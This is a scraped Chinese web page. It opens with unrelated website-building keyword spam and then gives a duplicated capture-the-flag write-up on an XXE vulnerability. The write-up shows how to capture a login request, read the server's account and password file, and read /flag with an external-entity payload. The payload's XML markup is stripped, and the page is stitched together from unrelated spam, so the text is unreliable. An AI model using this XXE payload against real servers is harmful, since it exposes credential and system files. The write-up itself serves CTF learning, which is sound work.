成都科盛兴网站建设有限公司,企业建网站一般要多少钱,深圳建设工程交易服务网网址,商城网站建设视频教程输入任意账号密码进行抓包 考查xxe漏洞
我们加入xxe语句并让它回显我们要它会显的东西#xff1a;先来读取一下用户名和密码 我们可以看到#xff0c;它已经读取了服务器下的账号密码文件#xff0c;接着我们直接读取根目录下的flag文件。通常情况下flag文件的位置一般就根…
输入任意账号密码进行抓包 考查xxe漏洞
我们加入xxe语句并让它回显我们要它会显的东西先来读取一下用户名和密码 我们可以看到它已经读取了服务器下的账号密码文件接着我们直接读取根目录下的flag文件。通常情况下flag文件的位置一般就根目录和var/www/html目录之下 或者是其父目录之下。存在的形式一般为flag、flag.txt、flag.php
?xml version1.0 ?
!DOCTYPE ANY [
!ENTITY admin SYSTEM file:///flag
]
userusernameadmin;/usernamepassword123/password
/user
